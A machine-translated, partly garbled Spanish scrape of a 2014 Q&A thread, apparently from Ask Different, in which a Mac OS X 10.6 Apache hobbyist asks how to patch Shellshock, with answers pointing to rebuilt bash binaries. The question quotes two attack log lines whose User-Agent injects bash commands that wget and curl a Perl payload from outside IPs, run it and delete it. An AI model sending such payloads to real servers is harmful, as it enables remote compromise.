Apple Shellshock parche para 10.6?

Estoy ejecutando un pequeño server HTTP (Apache) fuera de mi Mac principalmente como un hobby. Si se pone en peligro, no es el fin del mundo, pero es algo que ciertamente me gustaría evitar. Configuré un trabajo de launchctl para verificar el file de logging de Apache para posibles requestes relacionadas con Shellshock y anoche recibí dos inputs relacionadas:

82.221.128.246 - - [29/Sep/2014:08:14:41 -0400] "GET / HTTP/1.1" 200 2081 "-" "() { :;}; /bin/bash -c \"wget http://82.221.105.197/bash-count.txt\"" 173.45.100.18 - - [29/Sep/2014:00:52:07 -0400] "GET /cgi-bin/hi HTTP/1.0" 404 208 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"" 

El primero parece inofensivo y el IP alberga un website de aspecto muy legítimo, alegando que sus requestes son solo para fines de investigación. El segundo es una historia diferente, sin embargo, trata de download y ejecutar un script de Perl. Afortunadamente, no tengo instalado wget, por lo que este ataque no funcionó, pero parece que es solo cuestión de time antes de que reciba una request como esta que causa algún daño.

  • Restaurar desde copy de security: las aplicaciones en la biblioteca de iTunes no se instalaron en el iPhone porque se produjo un error desconocido 0xE800002D
  • Aplicación de correo que se agota y tiene problemas para get y enviar correo
  • macOS Sierra cambiando los perfiles de color al inicio
  • El iPhone está sincronizado con otro post de error de la biblioteca de iTunes
  • Símbolos de herramientas de Safari desaparecidos
  • ¿Cómo se atesting "Llamada no aprobada" mientras se instala el software?
  • Apple acaba de lanzar parches para OS X 10.7 y posterior, pero desafortunadamente estoy ejecutando 10.6. ¿Qué medidas simples y confiables puedo tomar (es decir, no recomstackr bash ) para networkingucir mis riesgos?

  • Obtener icono de alerta de punto de exclamación al abrir la mayoría de las imágenes en iPhoto
  • Vender mi Macbook roto. ¿Cómo asegurarse de que no haya información personal en el disco duro?
  • ¿Deshabilita la visualización de passwords en un iPhone?
  • Mi count icloud fue pirateada, cambié la contraseña, ¿qué más debería hacer?
  • ¿Cómo puedo get OS X para desafiarme por contraseña después de dormir?
  • MacBook Pro - mediados de 2010 - Errores de memory en AHT
  • 3 Solutions collect form web for “Apple Shellshock parche para 10.6?”

    Si no quiere comstackr Bash usted mismo, la gente de TenFourFox (que hace una versión PPC de Firefox) compiló un binary que funciona en OS X 10.4 – 10.9 tanto en PPC como en Intel Macs, y tiene instrucciones de terminal para instalar:

    http://tenfourfox.blogspot.com/2014/09/bashing-bash-one-more-time-updated.html

    En el momento de la networkingacción (30 de septiembre) han comstackdo Bash 4.3.27, pero esto todavía se pierde un par de vulnerabilidades que el parche oficial de Apple también se ha perdido. Por lo tanto, es mejor que nada, pero querrá seguir buscando futuras actualizaciones.

    Posiblemente podrías intentar recomstackr bash usando este enlace. Parchea la versión bash vulnerable, pero la nueva versión no está firmada por Apple y posiblemente podría romper cosas.

    Verifique la sección "Binarios del sistema" de esta respuesta. Funciona para 10.6.8, suponiendo que tiene Xcode instalado.

    https://apple.stackexchange.com/a/146851/96606

    Loving Apple Products like poisoning (iPhone, iPad, iMac, Macbook, iWatch).